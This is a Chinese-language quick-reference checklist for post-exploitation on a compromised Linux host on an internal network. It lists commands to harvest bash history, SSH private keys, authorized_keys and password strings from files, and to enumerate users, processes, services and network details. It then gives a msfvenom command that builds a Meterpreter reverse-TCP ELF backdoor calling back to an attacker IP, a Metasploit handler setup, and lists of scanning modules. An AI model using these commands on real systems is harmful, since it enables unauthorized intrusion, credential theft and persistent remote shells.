Linux 内网本机信息收集 速查 checklist
Linux 内网本机信息收集速查
系统类型
1 | cat /etc/issue |
网络信息收集
1 | last 多数运维会接入内网登录系统,这时候,便可获取部分内网ip 进而对内网IP段进行画像 |
直接命令搜敏感文件收集
1 | grep "password:" * -Rn |
常用敏感文件
1 | /root/.ssh/authorized_keys |
内核版本
1 | uname –a 查看所有信息 |
用户
1 | whoami |
进程
1 | ps aux 查看进程信息 |
网卡
1 | /etc/network/interfaces #网卡信息 |
服务信息
1 | cat /etc/serivice #查看存在的服务 |
服务配置
1 | cat /etc/apache2/apache2.conf |
日志信息
1 | /var/log |
历史命令
1 | ~/.bash_history |
软件信息
1 | dpkg -l #查看安装的软件包 |
关键信息收集
历史命令!
1 | /root/.bash_history |
本地保存的ssh密钥
1 | /root/.ssh/id_rsa |
LINUX后门生成
1.示例指令:
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell |
2.配置Metasploit
,exploit
监听
1 | search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序) |
nmap扫描:
1 | nmap ‐sP ‐PI 192.168.1.0/24 ‐T4 |
端口扫描
auxiliary/scanner/portscan
scanner/portscan/ack ACK防火墙扫描
scanner/portscan/ftpbounce FTP跳端口扫描
scanner/portscan/syn SYN端口扫描
scanner/portscan/tcp TCP端口扫描
scanner/portscan/xmas TCP”XMas”端口扫描
SMB扫描
scanner下模块,辅助发现内网存活主机,分别为:
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_sweep
auxiliary/scanner/ftp/ftp_version
auxiliary/scanner/http/http_version
auxiliary/scanner/smb/smb_version
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/telnet/telnet_version
auxiliary/scanner/discovery/udp_probe
auxiliary/scanner/dns/dns_amp
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/netbios/nbname
auxiliary/scanner/http/title
auxiliary/scanner/db2/db2_version
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/tcp